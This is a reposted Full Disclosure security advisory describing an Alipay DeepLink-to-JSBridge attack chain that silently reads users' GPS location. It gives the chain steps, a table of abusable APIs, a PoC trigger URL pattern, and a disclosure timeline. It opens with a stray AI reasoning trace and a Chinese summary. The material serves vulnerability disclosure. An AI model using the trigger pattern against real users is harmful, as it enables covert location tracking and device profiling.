Alipay DeepLink+JSBridge Attack Chain: Silent GPS Exfiltration, 17 Vulns, 6 CVEs (CVSS 9.3)
嗯,用户让我总结一下这篇文章的内容,控制在100字以内,而且不需要特定的开头。首先,我需要快速浏览文章内容,抓住关键点。 文章主要讲的是支付宝的一个安全漏洞,涉及到DeepLink和JSBridge的攻击链。攻击者可以通过一个精心设计的URL触发一系列漏洞,导致用户的位置信息被窃取。漏洞影响了10亿用户,CVSS评分高达9.3。 然后,漏洞链包括开放重定向、白名单绕过、WebView加载以及API滥用。攻击者可以利用这些步骤访问敏感的设备信息和位置数据。特别是iOS的攻击面比Android大。 研究人员在报告中提到了多个CVE,并且尽管向支付宝报告了问题,但支付宝认为这是正常功能,并没有修复。最后,研究人员公开了这个漏洞。 总结的时候要简明扼要,涵盖主要攻击方式、影响范围、漏洞细节以及处理结果。确保不超过100字。 </think> 支付宝DeepLink与JSBridge漏洞链允许攻击者通过恶意URL触发API滥用,窃取GPS坐标等敏感信息。该漏洞影响超10亿用户,CVSS评分最高9.3。 2026-3-12 21:59:39 Author: seclists.org(查看原文) 阅读量:24 收藏

fulldisclosure logo

Full Disclosure mailing list archives


From: Feng Ning via Fulldisclosure <fulldisclosure () seclists org>
Date: Thu, 12 Mar 2026 02:33:20 +0000

Subject: Alipay DeepLink+JSBridge Attack Chain: Silent GPS Exfiltration, 17 Vulns, 6 CVEs (CVSS 9.3)

# Alipay DeepLink + JSBridge Attack Chain
# Silent GPS Exfiltration via Crafted URL

## Overview

Researcher: Jiqiang Feng / Innora AI Security Research
Vendor: Ant Group (蚂蚁集团) / Alibaba Group
Product: Alipay (支付宝) v10.x (Android & iOS)
Users Affected: 1 billion+
CVEs: 6 submitted to MITRE CNA-LR (2026-03-12)
CVSS: 7.4–9.3
Vendor Response: "Normal functionality"
Disclosure: Responsible (Feb 25 → Mar 11 public)

## Vulnerability Chain

A single crafted URL triggers the following attack chain:

1. Open Redirect (CWE-601): ds.alipay.com/?scheme= accepts arbitrary URL parameters, redirecting to Alipay app via deep 
link
2. Whitelist Bypass (CWE-939): ds.alipay.com is a whitelisted Alipay domain, so the deep link handler trusts the 
redirect target
3. WebView Loading: Attacker-controlled page loads in Alipay's privileged WebView with JSBridge access
4. API Abuse: AlipayJSBridge.call() exposes sensitive native APIs without user consent

## Exploitable APIs (Verified)

| # | API | Data Extracted | Android | iOS |
|---|-----|---------------|---------|-----|
| 1 | getLocation | GPS coords (8.8m accuracy) | ✓ | ✓ |
| 2 | getNetworkType | WiFi/cellular, carrier info | ✓ | ✓ |
| 3 | getSystemInfo | Device model, OS, screen | ✓ | ✓ |
| 4 | getCameraPermission | Camera auth status | ✓ | ✓ |
| 5 | getMicrophonePermission | Mic auth status | ✓ | ✓ |
| 6 | tradePay | Pre-fill payment screen | ✗ | ✓ |
| 7 | share | Trigger share dialog | ✗ | ✓ |
| 8 | scan | Activate QR scanner | ✗ | ✓ |
| 9 | chooseImage | Access photo picker | ✗ | ✓ |

iOS attack surface is significantly larger than Android.

## PoC

Trigger URL pattern:
https://ds.alipay.com/?scheme=alipays://platformapi/startapp?appId=20000067&url=[BASE64_ENCODED_ATTACKER_URL]

Verification page (read-only, no data collection):
https://innora.ai/zfb/poc/trigger.html

## Verification

- 3 devices: Samsung S25 Ultra (NZ), Xiaomi Redmi 12 (MY), iPhone 16 Pro (CN-Hangzhou)
- 308 server-side exfiltration logs
- 42 screenshots
- Vendor's own security lead tested on iPhone from Hangzhou (Alipay HQ) — GPS captured silently in 7 seconds, accuracy 
8.8m

## Timeline

2026-02-25: Initial TLS/SSL report to vendor
2026-03-06: Vendor: "cannot be practically exploited"
2026-03-07: Expanded report (17 vulns, full E2E proof)
2026-03-07: Whitelist bypass achieved in 2 min during live call with vendor
2026-03-08: Vendor's security lead's iPhone tested from Hangzhou — GPS captured
2026-03-10: Vendor final: "normal functionality"
2026-03-11: Public disclosure
2026-03-11: Vendor's law firm files takedown complaint (4 hours later)
2026-03-12: 6 CVEs submitted to MITRE

## Full Report

https://innora.ai/zfb/ (bilingual EN/ZH)

## Notes

- Alibaba is a registered CNA (CNA-2017-0006) but refused to assign CVEs
- Vendor's law firm complaint targets an article that never once mentions "Alipay" or "Ant Group" by name
- Vendor's security contact privately called it a "洞" (hole/vuln) while officially classifying as "normal functionality"

## Contact

Jiqiang Feng | feng () innora ai | Innora AI Security Research

Attachment: publickey - Jiqiang Feng - 0x7D1A285E.asc
Description:

Attachment: signature.asc
Description: OpenPGP digital signature

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/

Current thread:

  • Alipay DeepLink+JSBridge Attack Chain: Silent GPS Exfiltration, 17 Vulns, 6 CVEs (CVSS 9.3) Feng Ning via Fulldisclosure (Mar 12)

文章来源: https://seclists.org/fulldisclosure/2026/Mar/4
如有侵权请联系:admin#unsafe.sh